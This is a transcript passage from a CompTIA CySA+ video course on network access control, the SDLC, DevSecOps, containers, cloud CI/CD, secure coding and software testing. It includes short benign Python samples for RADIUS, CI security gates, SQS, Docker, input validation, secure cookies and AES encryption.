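    NetworkAclId=acl_id, RuleNumber=100, Protocol="-1", RuleAction="allow",
    Egress=True, CidrBlock="0.0.0.0/0")

Anything not matched by the numbered rules still falls through to the default deny rule, and the ACL only takes effect once it is associated with one or more subnets, just as in the console walkthrough.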
Upon completion of this video, you will be able to describe the role NAC plays in securing a network
environment.
Objectives
[Video description begins] Topic title: Network Access Control. The presenter is Dan Lachance. [Video
description ends]
Network Access Control, as the name implies, is about limiting which devices can access the network.
[Video description begins] Remote Authentication Dial-In User Service (RADIUS). [Video description ends]
And
that can be based on a number of criteria. Part of that is using Remote Authentication Dial-In User Service or
RADIUS. So RADIUS servers are authentication servers. So when users connect to a network or they attempt
to connect to a network, we can first require that authentication succeed whether it's at the user and/or the
device level. So maybe the device has to authenticate because it's got a valid PKI certificate that's trusted, and
the user has supplied credentials that are also trusted and successful.
Now, authorization would be the permission to use resources on the network, in other words, to access the network. So the RADIUS server here could also be called an Identity Provider or IdP. Take note of what's happening here: we aren't leaving the authentication up to the edge network device, like a router, a VPN appliance, a switch, or a Wi-Fi router. Instead, those edge devices forward the authentication requests elsewhere, to a RADIUS authentication server on a protected network.
Aside from using device and user authentication to determine if network access is allowed, your implementation of network access control might also take a look at the state of the machine. Does it have all OS and software updates applied? Is there an anti-malware solution installed, and does it have updates applied? Otherwise, you could prevent network access, or allow the device to access only a restricted network where it can update the system.
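To make the RADIUS exchange a little more concrete, here is a minimal sketch of an Access-Request using the third-party pyrad Python library. The server name, shared secret, credentials, and NAS identifier are all placeholders, and a local RADIUS attribute dictionary file is assumed; in a real NAC deployment the edge device (switch, VPN appliance, or wireless controller) acts as the RADIUS client, not a script like this.

# Minimal RADIUS Access-Request sketch using the third-party pyrad library.
# Assumptions: pyrad is installed, a RADIUS attribute dictionary file named
# "dictionary" exists locally, and the server, secret, and credentials are placeholders.
from pyrad.client import Client
from pyrad.dictionary import Dictionary
import pyrad.packet

client = Client(server="radius.example.internal",
                secret=b"sharedsecret",
                dict=Dictionary("dictionary"))

# Build the authentication request with the user's name and encrypted password.
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
                              User_Name="jsmith",
                              NAS_Identifier="edge-switch-01")
req["User-Password"] = req.PwCrypt("P@ssw0rd")

reply = client.SendPacket(req)
if reply.code == pyrad.packet.AccessAccept:
    print("RADIUS accepted the request; grant network access")
else:
    print("RADIUS rejected the request; deny access or quarantine the device")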
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the security of network infrastructures for both on-premises and cloud-based
network configurations. We did this by exploring the management of on-premises and cloud-based networks.
We talked about network segmentation and VPN solutions, as well as how to link an on-premises network to the AWS cloud through a site-to-site VPN. We talked about factors to consider when designing a cloud
network strategy. And also we talked about the change management process and underlying supporting IT
services and the benefits of VDI.
We talked about how to configure and connect to a cloud VDI, about different types of firewalls for protecting digital assets, and about how to configure a Windows firewall and an AWS network ACL. And finally, we
talked about Network Access Control, RADIUS and TACACS+. In our next course, we'll move on to explore
security related to software development throughout the development life cycle, including vulnerability testing,
and secure coding practices.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer and Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The (CS0-002) CompTIA Cybersecurity Analyst or CySA+
Certification Exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore software development security from design to deployment and
maintenance, including talking about software vulnerability testing and secure coding practices. I'll start by
examining the Software Development Life Cycle or SDLC, and related methodologies such as the capability
maturity model or CMM, and the importance of addressing security during the entire IT life cycle. I'll then
explore microservices, decoupling, the benefits of application containerization in common Platform as a
Service software developer service offerings, as well as talking about secure coding practices. Next, I'll explore
the benefits of software testing including unit and regression tests. Lastly, I'll examine the use of reverse
engineering by malicious users to detect programming flaws and to demonstrate how to reverse engineer an
Android application using the Apktool.
In this video, you will identify the phases of the SDLC, including related methodologies such as the capability
maturity model.
Objectives
identify the phases of the SDLC, including related methodologies such as capability maturity model
[Video description begins] Topic title: Software Development Life Cycle. The presenter is Dan
Lachance. [Video description ends]
The Software Development Life Cycle or SDLC is a structured approach used by software developers to plan,
create, and deploy a software solution. It begins with system design specifications. What are the functional
requirements for the solution? What should it do? And how should it do it? Are there any specific details related to how authentication or encryption or data loss prevention should be put in place?
[Video description begins] Software Development Life Cycle (SDLC). [Video description ends]
Next is development and implementation. Now the development and implementation can be done on-premises,
so developers can use tools they're familiar with already, or they might use cloud-based developer solutions.
Often in the cloud, the underlying work of setting up the infrastructure, the servers, and the storage is taken care of.
So, developers can often generate code much more quickly because they can focus on the code itself and not
the underlying supporting infrastructure. The documentation should be generated as code is built and tested.
And, of course, as code modifications are made over time, this documentation can be used for training or for
onboarding of new employees for those that will be affected by this particular solution. Then there's the
evaluation such as the peer code review where other developers can look over code to ensure it looks like it's
done in accordance with secured coding practices. And then, of course, there's testing. Testing can be manual,
whether it's fuzz testing, the solution, or unit testing, or regression testing, or load testing. That can also be
automated. Finally after successful testing, the solution can transition to a production environment that can
include the packaging of the solution for different platforms, and the delivering of the solution to devices, such
as by posting the package on a web site for download, or even using push notifications to notify users of an
app that there is an update.
[Video description begins] Code Modifications and Automated Deployment. [Video description ends]
Software developers will often use a centralized tool again whether on-premises or in the cloud, they'll work
together on different chunks of code at different points in time. So, it would start with a developer, realizing
that a change needs to be made and then checking out that code module. Now, when they check it out, they're the only ones that have write access to it. So, the code is then modified in accordance with secure coding
practices. When the code is completed, then the code is checked in, after which that might trigger automated
testing, packaging, and deployment of the solution. Now, this whole workflow is called the code build process.
And from a security perspective, as a cybersecurity analyst, we need to be aware that at any point in this code
build process, if there are vulnerabilities, such as when the code is being modified, then a malicious user might
be able to inject some malicious code at that point before the code is checked in and then tested. The type of code that was injected determines whether it gets picked up by testing or peer review. The
Capability Maturity Model or CMM is a framework that's designed to continuously improve some kind of an
IT solution.
[Video description begins] Capability Maturity Model (CMM). [Video description ends]
So, on the cyber security side, it means that with CMM, we can plan for security practices. That might be, for
example, a specific way and sequence of events, standard operating procedures for developers to check out
code, make changes, check it in, and then run tests against it. So, it needs to be a standard set of consistent
practices that are used repetitively. So, the CMM then allows us to set expectations for the cybersecurity
programs, such as ensuring that secure coding practices are adhered to and standard operating procedures are
followed. So, we can define specific criteria for exactly how that should be done.
[Video description begins] The CMM defines criteria for standardized security practices. [Video description
ends]
So, there could be user onboarding for new developers that get hired, for example, on how the organization
expects the development process to work in accordance with the SDLC.
[Video description begins] Service Oriented Architecture (SOA). [Video description ends]
An XML gateway can be either a hardware or a software appliance. Its purpose is essentially to serve as a kind of service registry. So, what it will do is allow service providers to register APIs that are then advertised to clients
that might consume them. XML gateways can also serve as TLS termination points. So, if you're securing an application using HTTPS, then the TLS termination, the decryption, can happen at the XML gateway, thus offloading that computationally expensive task from a web server. There are other
standards as well, such as Web Services Security or WS-Security. This uses security mechanisms to protect SOAP
messages. SOAP is used by developers to send small transmissions over a network, so for sending and
receiving messages between software components. Web Services Trust, or WS-Trust, uses security tokens.
A security token is the result of successful authentication through a trusted central identity provider. And that
token is what gets handed off to allow access or to allow authorization to use other services or apps. WS-
SecurityPolicy is a framework that uses policy security settings that dictate how services will be accessed and
who is allowed to access them.
Upon completion of this video, you will be able to recognize how security must be addressed during the entire
IT life cycle.
Objectives
recognize how security must be addressed during the entire IT life cycle
[Video description begins] Topic title: DevSecOps. The presenter is Dan Lachance. [Video description ends]
SecDevOps stands for Security, Development, and Operations. It stems from DevOps. DevOps is a
combination of software development and software operation and software maintenance.
[Video description begins] Security, Development, and Operations (SecDevOps). [Video description ends]
So, it includes things like the creation of application programming interfaces or APIs, or it could include the
consumption of them, whether using messaging protocols to do that, such as SOAP or REST. And this also
deals with continuous integration and delivery or CI and CD of a solution, where code changes are made, and
automation is used to test solutions and deploy the package as quickly as possible.
But this has to be done with security in mind at all stages of the Software Development Life Cycle or SDLC.
So, security needs to be integrated into the development and the deployment process. So, this means any code
changes that are made need to be tested to ensure that secure coding practices are being adhered to and that
flaws aren't being introduced. Now that can be done through a peer review and/or through automated solutions.
Security needs to be integrated whenever this happens. It can't be something that is triggered manually when
developers are working on code.
The incident response plan, or the IRP, needs to be put in place, so that if there is some kind of a security
breach, when it comes to either the development of the software solution or the deployment of it, that there are
parties that know what their responsibilities are and which actions should be taken. So, automation is key when
it comes to SecDevOps. We want to use automation because it allows for repeated consistent practices. It also
reduces the element of human error. So, that would include things like automated testing when code is checked
in, automated software packaging deployment, even automated encryption of stored software solutions.
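As one small illustration of that automation, here is a sketch of a build gate script a CI pipeline could run whenever code is checked in. It assumes the pytest test runner and the Bandit static security scanner are installed and that the project source lives in a src directory; the exact tools and thresholds will vary by team.

# Minimal CI gate sketch: fail the build if tests or the static security scan fail.
# Assumptions: pytest and bandit are installed, and project code lives in ./src.
import subprocess
import sys

checks = [
    ["pytest", "--quiet"],            # automated unit and regression tests
    ["bandit", "-r", "src", "-ll"],   # static security scan, medium severity and up
]

for cmd in checks:
    print("Running:", " ".join(cmd))
    if subprocess.run(cmd).returncode != 0:
        sys.exit("CI gate failed on: " + " ".join(cmd))

print("All automated test and security gates passed; continue to packaging.")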
In this video, you will learn how software developers create modular, independent, and reusable code.
Objectives
identify how software developers create modular, independent, and reusable code
[Video description begins] Topic title: Microservices and Decoupling. The presenter is Dan Lachance. [Video
description ends]
Microservices have become a fundamental aspect of software development. The idea is to have modular
software components that together comprise an application. So, as opposed to writing a single big, large
application, we can have different microservices that handle certain functionality of the app.
So, what we're really talking about then is creating multiple different functions or application programming
interfaces, or APIs which are a collection of related functions, or even using application containers to run
specific software components. So, with microservices, each software component or module or microservice
whichever term you prefer, each one of them can communicate with other microservices. Now, this allows for
loose coupling. What that means is that, if we are using, for example, message queues to store messages sent and received between software components, component A might drop a message in the queue to be read at any time, whenever component B is available. So, microservices can also facilitate code modification and testing. Now,
how is this? Well, it's possible because a developer might check out just a small section of code.
In other words, a microservice where changes are required. Now you can check out that chunk of code using a
specific code repository and code building tool. Now while that code is checked out, nobody else can modify
it. So, it's modular in that sense. It's also modular in the sense that a microservice can be tested independently
of other microservices. The other thing to think about is code reusability. If we've developed, let's say, a
microservice that handles printing from the web. Well, that could be used over and over and over in many
different applications that need that kind of functionality. And so, because it's not built into an entire single
large monolithic application, but instead it's its own component, very easy to reuse.
[Video description begins] Decoupling. [Video description ends]
Now we talked about decoupling, where we might have app component 1 seen here on the left, that writes a
message into a message queue. Now, a message queue is a small storage location on disk somewhere. In the cloud, such as with Amazon Web Services or AWS, there is the Simple Queue Service or SQS offering, which is designed for message queuing. So, app component 1 drops a message into the queue, and that message needs to be read by app component 2. Whenever app component 2 is available, it can go read the message and then process whatever needs to be done. Now, this is as opposed to requiring both app components 1 and 2 to be online and reachable at the same time over the network. So, in this case, we're supporting
decoupling through the use of a centralized message queuing system.
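As a rough illustration of that pattern, here is a minimal sketch using Python and boto3 against SQS. The queue name is a placeholder; component 1 drops a message in the queue and moves on, and component 2 reads it whenever it becomes available.

# Minimal decoupling sketch with Amazon SQS via boto3.
# Assumptions: boto3 is installed, AWS credentials are configured, and the
# queue name below is a placeholder.
import boto3

sqs = boto3.client("sqs")
queue_url = sqs.create_queue(QueueName="app-component-messages")["QueueUrl"]

# App component 1 drops a message into the queue and carries on.
sqs.send_message(QueueUrl=queue_url, MessageBody="print job 42 is ready")

# App component 2, whenever it is available, reads and processes the message.
resp = sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=1,
                           WaitTimeSeconds=5)
for msg in resp.get("Messages", []):
    print("Processing:", msg["Body"])
    # Delete the message once processed so it is not delivered again.
    sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=msg["ReceiptHandle"])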
After completing this video, you will be able to recall the benefits of using containerized applications.
Objectives
[Video description begins] Topic title: Application Containerization. The presenter is Dan Lachance . [Video
description ends]
Application containerization has become more and more prevalent, especially for software developers.
Pictured in our diagram, we can see a number of application containers across the top, labeled as App A
through to App G. Now, an application container can contain the entire application software, or maybe
it's just a modular piece of code running in the container, such as a specific printing function. So, it's a
microservice that runs in a container that could be used over and over with multiple apps. So, that's another
possible way to work with application containerization. Now, the binary files and libraries called upon by
components within the container, all of that can be stored within the container, or it might be stored outside of
it in the underlying host OS.
Ideally, you will try to self-contain as much software as possible within the application container. Now, the
application container needs to have a specific containerization engine that manages them. And the most
common example is probably Docker. And that's why we see the Docker Engine listed here. Now, that would
be installed in a Windows or a Linux environment. So, you still need the underlying host operating system, or
OS. A container image is essentially a blueprint. It contains the software and settings for running whatever that
software component is within the container. Images can also contain metadata that describe the image. And
that might be useful if, for example, the image has a preconfigured MySQL database. Well, we might want that
to be somehow reflected in the metadata. So you could say, then, that a container is just a runtime instance of
an image. And that's true, it is. Now, the container will contain the software in question. It'll contain settings
related to that software and usually app-specific libraries. And anything else about the runtime environment,
such as environment variable configurations required for that software component to run. Now, the container
might also have tools that are used to tweak, manage, or somehow optimize the component running within that
container.
Containers have a lot of benefits. There's a reason they're being used on a large scale these days, both on-
premises and in the cloud. The first benefit is quick container startup time. Now, this is true because the
operating system is already running. Remember, an app container does not contain an operating system like a
virtual machine does. You don't have to wait for the OS to spin up because it's already been spun up. It's
already there and running. The container simply runs as a process running within the host OS. Also, make sure
that you store application-specific elements within the container as much as possible. Because the benefit of
doing this is that the app is self-contained. So, it can be tested and scaled and managed separately from other
app containers. But the other benefit of having everything stored within the container is portability. You can
move it around to different containerization hosts.
On the security side, because containers have generally a shorter lifespan than a normal application simply
installed and running on an OS, it means that there's less of a chance of advanced persistent threats being
installed over a long period of time. Remember, an APT, or advanced persistent threat, means that a
component or a device or a host was compromised, and essentially the attackers remain in there undetected for
a period of time. So, due to the shorter container lifespan, that's probably not going to happen as often. For example, you might have an application container that has a specialized printing function for an app. And it's
only up and running when it's needed by another software component. It doesn't always have to be up and
running. The other thing is that containers are processes running within the OS. And depending on your
containerization engine, like Docker, you can determine what privileges containers will run with. So, the idea
is to make sure they don't run with full privileged capabilities, such as the administrator Windows account or
the Linux root account.
The other thing that we want to make sure of is that sensitive data is not stored in containers, where possible.
And when you are starting to work with a container, you might use an existing container image that has pretty
much what you need already done. And while that might be tempting, make sure you only use containers that
are from trusted third parties. And they should be digitally signed.
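To tie a couple of those recommendations together, here is a minimal sketch using the Docker SDK for Python that runs a short-lived container as a non-root user. It assumes the Docker Engine is running and the docker Python package is installed; the image tag is a public example, and in practice you would verify that any image you pull is from a trusted, signed source.

# Minimal sketch: run a short-lived container as a non-root user with the
# Docker SDK for Python. Assumptions: Docker Engine is running and the
# "docker" Python package is installed; the image tag is a public example.
import docker

client = docker.from_env()

# Run the containerized process as the unprivileged "nobody" account rather than
# root, and remove the container as soon as it exits (short lifespan).
logs = client.containers.run(
    "python:3.12-alpine",
    ["python", "-c", "print('hello from an unprivileged container')"],
    user="nobody",
    remove=True,
)
print(logs.decode())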
Upon completion of this video, you will be able to list common software developer service offerings for PaaS.
Objectives
[Video description begins] Topic title: Cloud Developer Services. The presenter is Dan Lachance. [Video
description ends]
There are plenty of cloud-based developer service offerings, and they make overall development quicker because the underlying architecture is already set up by the cloud service provider. So, let's talk about some
benefits of cloud-based CI/CD solutions.
CI/CD means continuous integration and continuous deployment. What that generally refers to, in a software development context, is very quickly integrating changes into code, very quickly testing it, and applying security at all phases of the software development life cycle. And then, of course, quickly packaging and deploying the solution and making it available. It's all about doing things quickly and efficiently and effectively
and securely. So, this applies to coding and testing using cloud-based code repositories.
A code repository is a centralized storage location for code. And if you're working with modular code, if you're working with microservices where you've got specialized chunks of code that have their own functionality, it allows developers to work on each of those chunks of code or microservices separately from others. So, it makes it very efficient not only from the modification level but also from the testing, the scaling,
and security aspect, because it can be done on a per microservice level. Code builds are often facilitated by the
use of a centralized multideveloper team tool. Now using a tool like this allows developers to check out a
chunk of code or a microservice, which means nobody else can modify it while they have that code checked
out. And then, of course, after the code is checked back in, it could be tested and then that might even trigger
an automatic code build. In other words, recompiling the software and then packaging it up, in preparation for
code deployment. Code deployment could be as simple as posting a new version of software on a website for
people to download. Or in some cases, it might automatically use some kind of push notification mechanism to
push out the updates, or at least push out the notifications of updates to people using the app.
Coding and testing starts with the actual coding. Secure coding practices need to be adhered to by developers.
Because even though we might apply security controls after the fact, those controls won't be as effective as they would have been if secure coding guidelines had been adhered to from the start, so this is very important. Next, code builds, as we've discussed, can occur. Then testing, ideally that will
be automated, then having a staging area to package up the solution and then deploying it to a production
environment. So, automating as much of this as possible, not only makes the process much more efficient, but
it can also make it more secure. In other words, less susceptible to human error.
Cloud code repositories are central locations to store code. And so we could have code storage and versioning,
where we track all the updates that are made to different chunks of code. This would allow for centralized
collaborative coding, as well as review. So, developers can still use familiar tools if you're using a cloud-based
repository. So, whether you're dealing with a public cloud provider like Microsoft Azure, or Amazon Web
Services, to name just a few, they all support creating your own private code repositories that are compatible
with GitHub.
[Video description begins] Cloud Code Repositories allow private repository hosting. [Video description ends]
So, if you're already familiar with how to use GitHub based tools, you're still going to be in a familiar
environment. You can also scale the storage for storing code and code modifications in the cloud. That's one of
the great things about the cloud is the rapid elasticity with which cloud infrastructure can be deployed. We then
have to think about encrypting data in transit. So, a developer might be working on a laptop on-premises and pulling down code, maybe checking out the code from a repository to make changes to it. And, if that's happening over the
Internet, we want to make sure that connection is encrypted. So, either HTTPS is being used or the connection
is being made through a VPN tunnel. Of course, encrypting data at rest, server-side wherever the code is being
stored is also important. You can also set IAM permissions to specific repositories. Now this is especially true
in cloud environments, where we can create roles, or collections of related permissions, that we assign to users
or groups to give those specific permissions, such as any related to working with code in a cloud-based
repository.
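As a small, hedged example of what that looks like in practice, here is a sketch that creates a private Git repository in AWS CodeCommit with boto3. The repository name and description are placeholders, access is still governed by the IAM roles and permissions just mentioned, and the service handles encryption at rest and encrypted HTTPS or SSH connections in transit.

# Minimal sketch: create a private Git repository in AWS CodeCommit with boto3.
# Assumptions: boto3 is installed and the calling IAM identity has CodeCommit
# permissions; the repository name and description are placeholders.
import boto3

codecommit = boto3.client("codecommit")

repo = codecommit.create_repository(
    repositoryName="payroll-microservice",
    repositoryDescription="Example repository for the payroll microservice",
)

# Developers would clone this over HTTPS (encrypted in transit) and keep using
# familiar Git tooling to check code in and out.
print("Clone URL:", repo["repositoryMetadata"]["cloneUrlHttp"])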
[Video description begins] Code Building and Packaging. [Video description ends]
With code building and packaging, we're talking about the compiling of code after a piece of code that's been checked out for modification gets checked back in and committed, or written to the store. So, then
we can have automated testing and there are many different types of tests, and then ultimately the automatic
creation of software packages.
We talked about code deployment. Now, the idea is that having smaller updates on a continuous basis, always looking for improvement, means smaller amounts of code that have to be changed and deployed. And since a failure in this example might only apply to a recently deployed feature, it allows developers to find the problem more quickly than if there's only a security update once a year for the entire application as opposed to individual components. This also allows for a shortened time to market, which gives us a competitive edge when it comes to making changes to software and making them available as quickly as possible. The deployment could be to on-premises or cloud locations, such as instances, in other words, virtual machines. And also, rollback can be configured to be automatic when the deployment of a solution fails.
After completing this video, you will be able to recognize common secure coding practices.
Objectives
[Video description begins] Topic title: Secure Coding. The presenter is Dan Lachance. [Video description
ends]
It's important that cybersecurity analysts have a degree of knowledge of one or more programming languages.
Now the client side has a number of different components that developers might create depending on the type
of solution being built, such as writing JavaScript that might be embedded within HTML code or, of course,
writing HTML to describe the formatting of web pages to control their appearance. And also perhaps even the
use of precompiled web browser plug-ins to give additional functionality to the app, such as the ability to view
PDFs or the ability to play embedded videos without requiring a third-party app installed on the machine
outside of the browser.
Multi-tiered web applications will also use code at some level. The question is exactly where all the code components exist. In this example, we've got a web server at the top in the DMZ, the demilitarized zone. So,
that would be the front-end web interface, for example, for a web application that a user would interact with.
So, there might be HTML-based forms. There might be some JavaScript. It could be a lot of things built into
that. So, you will have some code components that get downloaded to the client web browser from the web
server. Now that would be out on the Internet. Now the other thing to notice in this diagram is that we've got
an internal network. And this might be where you choose to host database servers used by the front-end web
server in the DMZ. It's also where you would find things like authentication servers. We don't want apps
themselves to perform authentication. We want them to refer authentication to a centralized and trusted
identity provider.
In our diagram, that's listed at the bottom center as an authentication server. And so, there could be code
components then that also reside on other servers, such as on the internal network. An example of this might be
having some stored procedures that get triggered when certain events occur within the database. So, the idea is
think about where the code modules might reside. Another item that we don't see listed here in the diagram is
the use of some custom code being stored in a cloud computing environment.
Secure coding, as the phrase implies, is a way to write code at the software development level while adhering
to security principles. And so, the specific details will vary from one programming language to another, but a
lot of the concepts are the same. The general concepts mean ensuring confidentiality where possible, integrity,
and availability. The confidentiality would be things like encryption. Integrity would be ensuring that we
validate user-supplied input to an app. You need to treat user-supplied input to an app as suspicious, and essentially as malicious until proven otherwise. Availability means ensuring that we've got a solution
available in more than one location, for example, through clustering, or through replicating data to alternate
sites. So, this could involve using TLS, Transport Layer Security, for encryption or confidentiality, digital
signatures to ensure that transmissions over the network are authentic, password complexity, and as we've
mentioned, app clustering.
[Video description begins] Secure Coding - SDLC Phases. [Video description ends]
[Video description begins] An image is displayed. It contains several blocks labeled "Define requirements",
"Plan and design", "Coding", "Test", "Deploy", and "Operate and maintain". The Define requirements block
is connected to the Plan and design block. The Plan and design block is connected to the Coding block. The
Coding block is connected to the Test block. The Test block is connected to the Deploy block. The Deploy
block is connected to the Operate and maintain block. The Operate and maintain block is connected to the
Define requirements block. [Video description ends]
It's important that security be applied to all phases of the SDLC. All too commonly, and you might have experienced this yourself, there just won't be enough time to properly think about security as it applies to the
building of a software or IT-related solution. And also it's about money. And that usually is related to time. If
we're going to allocate time, it means we're allocating costs or resources to securing the solution. So, we're
focusing here on secure coding, actually writing the code as part of the SDLC. But it's important to remember
security needs to be applied to all levels of the SDLC.
So, secure coding means treating user-supplied data as untrusted. It's not to be trusted. So, we need to have
proper input validation routines to ensure that what the user is entering in is what we intended to have entered
in, such as in a form field in an HTML web page environment. We can sanitize user input, maybe stripping out
special characters that might have meaning in the underlying database or operating system. And it might also
mean the use of hidden fields to perform background checks on what the user is typing in or supplying. The
user can't see it. Now, at the same time, when we're talking about what the user can see, in the user interface,
we want to make sure that we don't depend on only user interface security controls to protect things. In other
words, you don't want to depend on a user clicking on a specific button before sending something to a server.
Because these can be bypassed easily, malicious users can download the underlying code that is running client
side for that app. And they might notice that a security check is only triggered when a user clicks a button. And
so, they might modify a URL to bypass the clicking of that button, thus, bypassing security checks. So,
malicious URLs then might be constructed to do just that.
Now, we also have to think about error messages that might be returned when an error condition is encountered. We don't want to reveal too much sensitive information on a customized error web page, such as the
version of the database engine being used. We might want to work with session timeouts to make sure that the
session timeout makes sense for the way the app will be used. If you have very, very long session timeouts,
then it might be easier for a malicious user to send a denial-of-service attack to a web server. For example, by
sending a bunch of half-open sessions. If you have a very long session timeout, it won't take long before server resources are exhausted.
We need to think about the data type and the length, the amount of data that will be supplied by a user to an
app, whether it's through an HTML web form, or through a URL parameter. We want to make sure that we
only allow for what we expect. So, if we expect a three-digit code, that's all that should be allocated to
memory. And the computer language you're writing code in will determine which functions you might use to parse and process that information. Some are more secure than others. It's also important that
validation of user input be done server side, not client side. Now, some people don't like this because it means
until they submit, let's say a form that they filled out to the web app, they don't know that there are errors,
maybe they didn't input a ZIP code or a postal code. They won't know that until they submit it to the server.
Some people want that to happen as you go from field to field on a web form, which is great functionally. But
the problem is we're relying on validation in client-side code that we lose control of once it's downloaded to
the client. And that's why validation really needs to occur server side.
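As a small illustration of those two points, treating input as untrusted and validating it server side, here is a sketch using Python with the Flask framework. The route, field name, and validation rule are hypothetical; the key ideas are the allow-list check performed on the server and the parameterized database query rather than string concatenation.

# Minimal server-side input validation sketch (hypothetical Flask route and field).
# Assumptions: Flask is installed; the SQLite lookup is illustrative only.
import re
import sqlite3
from flask import Flask, request, abort

app = Flask(__name__)
ZIP_PATTERN = re.compile(r"^\d{5}$")  # allow-list: exactly five digits

@app.route("/lookup", methods=["POST"])
def lookup():
    zip_code = request.form.get("zip", "")
    # Validate on the server; never rely only on client-side JavaScript checks.
    if not ZIP_PATTERN.fullmatch(zip_code):
        abort(400, "Invalid ZIP code")
    conn = sqlite3.connect("app.db")
    # Parameterized query: user input is never concatenated into the SQL string.
    rows = conn.execute("SELECT city FROM zips WHERE zip = ?", (zip_code,)).fetchall()
    conn.close()
    return {"results": [row[0] for row in rows]}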
We then have to think about encoding. So, for example, we might encode data to a specific standardized
character set before validating the input. So, by doing this with our input validation, we want to make sure that we are checking for certain types of characters that might get by our normal validation rules, like null bytes, newline characters, or slashes and dots. Other things to think about at the
software development level is the generation of unique session identifiers. Every time a user has a new session
with the server, we don't want those hanging around for too long because they could be hijacked and used by a
malicious user. Keep session identifier information hidden. We shouldn't allow multiple concurrent user
account logins with the same account. And we can even do some HTML and HTTP stuff to secure an app or to
help secure it, such as configuring the secure cookie attribute.
Basically, a cookie is a text file used by your web browser to store session information or user preferences. But
using a secure cookie means it can only be used in certain specific ways within specific sessions. And we
should always adhere to the principle of least privilege for app pages. What this means is unless someone
absolutely requires access to specific web pages when using an app, unless they absolutely need that privilege,
they shouldn't have it. We should always have a continuous monitoring solution in place for our apps. So, to
audit app access over time. Perhaps looking for irregularities, such as people logging into an app in the middle
of the night when that normally doesn't happen.
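For the cookie attributes just mentioned, here is a minimal sketch of setting a hardened session cookie in a Flask response. The cookie name, lifetime, and token generation are illustrative assumptions, not a prescribed configuration.

# Minimal sketch: set a hardened session cookie (hypothetical Flask view).
# Assumptions: Flask is installed; the token would normally come from your session logic.
import secrets
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login")
def login():
    resp = make_response("Logged in")
    token = secrets.token_urlsafe(32)   # unique, hard-to-guess session identifier
    resp.set_cookie(
        "session_id", token,
        secure=True,       # only ever sent over HTTPS
        httponly=True,     # not readable from client-side JavaScript
        samesite="Strict", # not sent on cross-site requests
        max_age=900,       # short session lifetime (15 minutes)
    )
    return resp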
The other thing to think about is key management if you're using cryptographic keys, such as with PKI
certificates. An entire PKI or public key infrastructure is rendered useless if private keys are compromised,
especially private keys higher up in the PKI hierarchy. We should be encrypting data at rest using at least AES
256-bit encryption. We should also use centralized app logging, because if a web server, for example, gets compromised and it's the only place where web app logs exist, that's a problem: the logs are under the control of the malicious user. So, they could feed false data into the log or clear it. So, we need that stored elsewhere. Where possible,
software developers should use existing code libraries and components that are trusted and digitally signed,
instead of trying to reinvent the wheel. Not only will this help with security but it also ends up meaning that
whatever the software solution is that the development team is working on will be completed quicker.
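For encrypting data at rest with AES-256, here is a minimal sketch using the widely used Python cryptography library and its AES-GCM primitive. Key management, storing and protecting the key itself, ideally in a vault or hardware security module, is deliberately left out of this sketch.

# Minimal AES-256-GCM encryption sketch using the "cryptography" library.
# Assumptions: the cryptography package is installed; key storage and management
# (the hard part) are not shown here.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # 256-bit AES key
aesgcm = AESGCM(key)

nonce = os.urandom(12)                      # unique nonce for each encryption
plaintext = b"example sensitive record"
ciphertext = aesgcm.encrypt(nonce, plaintext, None)

# Decryption requires the same key and nonce; any tampering raises an exception.
assert aesgcm.decrypt(nonce, ciphertext, None) == plaintext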
The other thing to watch out for is cleaning up after yourself if you're a software developer. So, normally when
you're writing code and testing, you'll add little hints and notes, especially during a peer review where others
are reading your code. We want to make sure that those are removed. One of the reasons is because there's a
possibility that a malicious user could reverse engineer or decompile something that you've written. And then
see all of these comments, which could reveal a lot of details that should not really be known. And finally, the
last thing to think about is to always apply updates to any centralized code libraries that might be used by
software developers. And also applying updates to third-party components that are being used by an app.
After completing this video, you will be able to recall how software testing can result in more secure software
solutions.
Objectives
recall how thorough software testing can result in more secure software solutions
[Video description begins] Topic title: Software Testing. The presenter is Dan Lachance. [Video description
ends]
There are many different ways to test IT solutions for security weaknesses. One way is to use an isolated sandbox environment. This means, for example, that if you want to test the security of a specific type of configuration on the network, perhaps updates being deployed to Windows 10 stations, you might set that up in a virtualized sandbox environment to test any potential security implications. It also means
conducting periodic vulnerability testing.
This is passive and it really identifies any weaknesses that need to be addressed. Whereas penetration testing is
a little more active in that it attempts to exploit discovered weaknesses. Well, our focus here for security
testing methodologies is really on software coding and best practices.
One example is what's called white box testing otherwise called Static Application Security Testing or SAST.
With white box app testing, this means that the testing team knows about the source code. They have access to
the actual source code itself, as in prior to compilation. And so this kind of analysis can be useful to determine
if input validation is not being handled properly simply by reviewing the code without even testing it.
However, you also have Black box testing, which is also called Dynamic Application Security Testing or
DAST, D-A-S-T. Now, this gives more of an indication of what the average outside malicious user might be
able to do to an app in terms of reverse engineering it because they don't have access to the source code.
So, static app testing then is one of those things that can be built directly into your code build process because
it has access to the code before it's compiled. Now that type of testing would not be applicable when you have
compiled code, which is a result of running the code through the code build process. Now the only downside to
Dynamic Application Security Testing or DAST is that it can only be applied after a solution is compiled. And
remember that security needs to be applied at every layer of the Software Development Life Cycle. So, really
the best solution is the best of both worlds both SAST and DAST testing. Now, fuzz testing is one type of test
whereby you feed unexpected data to an app to observe its results. Unit testing applies to modular chunks of
code such as microservices, which could come in the form of an application container. The beauty is that you can make a change to one segment of code, one unit, even checking out only that segment of code so it doesn't affect any other part of the code. You can make changes and test them thoroughly to make sure it's ready for
production, so it's very modular that way.
Functional testing is important to ensure that we've got functional requirements being met by a given solution.
Whereas regression testing is used to make sure that a new change, a new modification doesn't adversely affect
an unrelated part of an application.
